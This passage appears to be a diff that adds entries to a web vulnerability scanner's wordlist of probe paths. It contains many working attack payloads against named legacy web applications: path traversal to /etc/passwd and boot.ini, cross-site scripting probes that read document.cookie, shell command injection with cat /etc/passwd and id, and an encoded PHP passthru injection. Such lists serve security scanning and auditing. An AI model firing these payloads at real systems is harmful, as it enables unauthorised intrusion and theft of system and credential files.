+smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
+smbcfg.nsf
+smconf.nsf
+smency.nsf
+smg_Smxcfg30.exe?vcc=3560121183d3
+smhelp.nsf
+smmsg.nsf
+smquar.nsf
+smsolar.nsf
+smssend.php
+smtime.nsf
+smtp.box
+smtp.nsf
+smtpibwq.nsf
+smtpobwq.nsf
+smtptbls.nsf
+smvlog.nsf
+soap/servlet/soaprouter
+soapConfig.xml
+soapdocs/ReleaseNotes.html
+soapdocs/webapps/soap/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+software.nsf
+software/
+soinfo.php?\"><script>alert('Vulnerable')</script>
+sojourn.cgi?cat=../../../../../../../../../../etc
+sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+solaris/
+some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
+some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
+some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
+source/
+spelling.php3+
+spin_client.cgi?aaaaaaaa
+spwd
+sql/
+sqldump.sql
+sqlnet.log
+sqlqhit.asp
+squirrelmail/src/read_body.php
+src/
+src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
+srchadm
+srvinst.nsf
+srvnam.htm
+srvstatus.chl+
+ss
+ss.cfg
+ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
+sscd_suncourier.pl
+ssdefs/siteseed.dtd
+ssi/
+ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
+staff/
+start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
+start.php?config=alper.inc.php
+stat.htm
+stat.pl
+stat/
+staticpages/index.php
+statistic/
+statistics/
+statmail.nsf
+statrep.nsf
+stats-bin-p/reports/index.html
+stats.htm
+stats.html
+stats.pl
+stats.prf
+stats.txt
+stats/
+stats/statsbrowse.asp?filepath=c:\&Opt=3
+stats_old/
+statsconfig
+status.php3
+status/
+status?full=true
+statusconfig.pl
+statview.pl
+stauths.nsf
+stautht.nsf
+stconf.nsf
+stconfig.nsf
+stdnaset.nsf
+stdomino.nsf
+stlog.nsf
+store.cgi?
+store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
+store/
+store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
+store/agora.cgi?cart_id=<script>alert('XSS')</script>
+store/agora.cgi?page=whatever33.html
+store/index.cgi?page=../../../../../../../../etc/passwd
+story.pl?next=../../../../../../../../../../etc
+story.pl?next=../../../../../../../../../../etc/passwd%00
+story/story.pl?next=../../../../../../../../../../etc/passwd%00
+story/story.pl?next=../../../../../../../../../../passwd%00
+streg.nsf
+stronghold-info
+stronghold-status
+structure.sql
+stsrc.nsf
+style/
+styles/
+stylesheet/
+stylesheets/
+subir/
+submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
+submit?setoption=q&option=allowed_ips&value=255.255.255.255
+sun/
+sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
+super_stats/access_logs
+super_stats/error_logs
+support/
+support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+support/messages
+supporter/index.php
+supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
+supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
+supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
+supporter/tupdate.php
+surf/scwebusers
+survey
+survey.cgi
+sw000.asp?|-|0|404_Object_Not_Found
+swf
+sws/admin.html
+sws/manager.pl
+sys/
+syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
+syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
+syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
+syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
+syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
+syslog.htm?%20
+system/
+sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/iecreate.stm?template=../
+sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/ieedit.stm?url=../
+sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
+sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
+tablebuild.pl
+talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
+tar/
+tarjetas/
+tcb/files/auth/r/root
+tcsh
+technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
+technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
+technote/print.cgi
+temp/
+template/
+templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
+temporal/
+test
+test-cgi.bat
+test-cgi.exe?<script>alert(document.cookie)</script>
+test-cgi.tcl
+test-cgi?/*
+test-env
+test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+test.cgi
+test.htm
+test.html
+test.nsf
+test.php
+test.php%20
+test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
+test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
+test.txt
+test/
+test/info.php
+test/jsp/Language.jsp
+test/jsp/buffer1.jsp
+test/jsp/buffer2.jsp
+test/jsp/buffer3.jsp
+test/jsp/buffer4.jsp
+test/jsp/declaration/IntegerOverflow.jsp
+test/jsp/extends1.jsp
+test/jsp/extends2.jsp
+test/jsp/pageAutoFlush.jsp
+test/jsp/pageDouble.jsp
+test/jsp/pageExtends.jsp
+test/jsp/pageImport2.jsp
+test/jsp/pageInfo.jsp
+test/jsp/pageInvalid.jsp
+test/jsp/pageIsErrorPage.jsp
+test/jsp/pageIsThreadSafe.jsp
+test/jsp/pageSession.jsp
+test/phpinfo.php
+test/realPath.jsp
+test/test.cgi
+testcgi.exe
+testcgi.exe?<script>alert(document.cookie)</script>
+testing/
+tests/
+texis.exe/?-dump
+texis.exe/?-version
+texis.exe/junk
+texis/junk
+texis/phine
+texis/websearch/phine
+textcounter.pl
+thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
+theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
+theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
+theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
+theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
+themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
+ticket.php?id=99999
+tidfinder.cgi
+tigvote.cgi
+tinymsg.php
+title.cgi
+tmp/
+tmp_view.php?file=/etc/passwd
+today.nsf
+tomcat-docs/index.html
+tools/
+topic/entete.php
+topsitesdir/edit.php
+tpgnrock
+tpv/
+trabajo/
+trace.axd
+traffic.cgi?cfg=../../../../../../../../etc/passwd
+trafficlog/
+transito/
+tree
+tree/
+trees/
+troops.cgi
+tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+tsweb/
+ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
+ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
+ttforum/index.php
+ttp://127.0.0.1:2301/
+tutos/file/file_new.php
+tutos/file/file_select.php
+tvcs/getservers.exe?action=selects1
+typo3/typo3/dev/translations.php
+typo3conf/
+typo3conf/database.sql
+typo3conf/localconf.php
+uifc/MultFileUploadHandler.php+
+ultraboard.cgi
+ultraboard.pl
+unlg1.1
+unlg1.2
+upd/
+update.dpgs
+updates/
+upload.asp
+upload.cgi
+upload.cgi+
+upload.php?type=\"<script>alert(document.cookie)</script>
+uploader.php
+uploadn.asp
+uploadx.asp
+uptime
+url.jsp
+urlcount.cgi?%3CIMG%20
+urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
+us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
+usage/
+user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
+user.php?op=userinfo&uname=<script>alert('hi');</script>
+user/
+useraction.php3
+usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
+userinfo.php?uid=1;
+userlog.php
+userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
+userreg.nsf
+users.lst
+users.nsf
+users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+users/
+users/scripts/submit.cgi
+ustats/
+ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
+ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
+usuario/
+usuarios/
+utils/sprc.asp
+utils/sprc.asp+
+utm/admin
+utm/utm_stat
+vars.inc+
+vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vc30/
+vchat/msg.txt
+vfs/
+vgn/ac/data
+vgn/ac/delete
+vgn/ac/edit
+vgn/ac/esave
+vgn/ac/fsave
+vgn/ac/index
+vgn/asp/MetaDataUpdate
+vgn/asp/previewer
+vgn/asp/status
+vgn/asp/style
+vgn/errors
+vgn/jsp/controller
+vgn/jsp/errorpage
+vgn/jsp/initialize
+vgn/jsp/jspstatus
+vgn/jsp/jspstatus56
+vgn/jsp/metadataupdate
+vgn/jsp/previewer
+vgn/jsp/style
+vgn/legacy/edit
+vgn/legacy/save
+vgn/license
+vgn/login
+vgn/login/1,501,,00.html?cookieName=x--\>
+vgn/performance/TMT
+vgn/performance/TMT/Report
+vgn/performance/TMT/Report/XML
+vgn/performance/TMT/reset
+vgn/ppstats
+vgn/previewer
+vgn/record/previewer
+vgn/style
+vgn/stylepreviewer
+vgn/vr/Deleting
+vgn/vr/Editing
+vgn/vr/Saving
+vgn/vr/Select
+vider.php3
+view-source
+view-source?view-source
+view_item?HTML_FILE=../../../../../../../../../../etc
+view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+view_source.jsp
+viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
+viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
+viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
+viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
+viewlogs.pl
+viewpage.php?file=/etc/passwd
+viewsource?/etc/passwd
+viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+viralator.cgi
+virgil.cgi
+visadmin.exe
+visitor.exe
+vote.cgi
+vpasswd.cgi
+vpuserinfo.nsf
+vq/demos/respond.pl?<script>alert('Vulnerable')</script>
+vq/demos/respond.pl?<script>alert('XSS')</script>
+w-agora/
+w3-msql
+w3-sql
+w3perl/admin
+wa.exe
+wais.pl
+warez/
+way-board.cgi?db=/etc/passwd%00
+way-board/way-board.cgi?db=/etc/passwd%00
+wbboard/profile.php
+wbboard/reply.php
+wconsole.dll
+web-console/ServerInfo.jsp%00
+web.config
+web.nsf
+web/
+web800fo/
+webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
+webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
+web_app/WEB-INF/webapp.properties
+webaccess.htm
+webaccess/access-options.txt
+webadmin.nsf
+webadmin/
+webais
+webalizer/
+webamil/test.php
+webamil/test.php?mode=phpinfo
+webapp/admin/_pages/_bc4jadmin/
+webbbs.cgi
+webbbs.exe
+webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
+webboard/
+webcache/
+webcache/webcache.xml
+webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
+webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
+webcalendar/login.php
+webcalendar/view_m.php
+webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
+webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
+webcart-lite/
+webcart-lite/config/import.txt
+webcart-lite/orders/import.txt
+webcart/
+webcart/carts/
+webcart/config/
+webcart/config/clients.txt
+webcart/orders/
+webcart/orders/import.txt
+webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
+webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
+webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
+webdata/
+webdav/index.html
+webdist.cgi?distloc=;cat%20/etc/passwd
+webdriver
+webfind.exe?keywords=01234567890123456789
+webgais
+webif.cgi
+weblog/
+weblogic
+weblogs/
+webmail/
+webmail/blank.html
+webmail/horde/test.php
+webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
+webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+webmail/lib/emailreader_execute_on_each_page.inc.php
+webmail/src/read_body.php
+webmap.cgi
+webmaster_logs/
+webnews.pl
+webplus.exe?about
+webplus?about
+webplus?script=../../../../../../../../../../etc
+webplus?script=../../../../../../../../../../etc/passwd
+websendmail
+website/
+webspirs.cgi?sp.nextform=../../../../../../../../../../etc
+webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
+webstats/
+webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+webtop/wdk/
+webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
+webtop/wdk/samples/index.jsp
+webuser.nsf
+webutil.pl
+webutils.pl
+webwho.pl
+welcome.nsf
+wguest.exe
+whatever.htr
+whateverJUNK(4).html
+where.pl?sd=ls%20/etc
+whois.cgi?action=load&whois=%3Bid
+whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
+wikihome/action/conflict.php
+windmail
+windmail.exe
+windows/
+wksinst.nsf
+word/
+work/
+wrap
+wrap.cgi
+ws_ftp.ini
+wstats/
+wusage/
+www-sql
+www-sql/
+www/
+wwwadmin.pl
+wwwboard.cgi.cgi
+wwwboard.pl
+wwwboard/passwd.txt
+wwwboard/wwwboard.cgi
+wwwboard/wwwboard.pl
+wwwjoin/
+wwwlog/
+wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
+wwwstats.html
+wwwstats.pl
+wwwstats/
+wwwthreads/3tvars.pm
+wwwthreads/w3tvars.pm
+wwwwais
+wx/s.dll?d=/boot.ini
+x_stat_admin.php
+xdk/
+xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
+yabbse/Reminder.php
+yabbse/Sources/Packages.php
+z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
+zentrack/index.php
+zipfiles/
+zml.cgi?file=../../../../../../../../../../etc
+zml.cgi?file=../../../../../../../../../../etc/passwd%00
+zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+zsh
+~/<script>alert('Vulnerable')</script>.asp
+~/<script>alert('Vulnerable')</script>.aspx
+~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
+~nobody/etc/passwd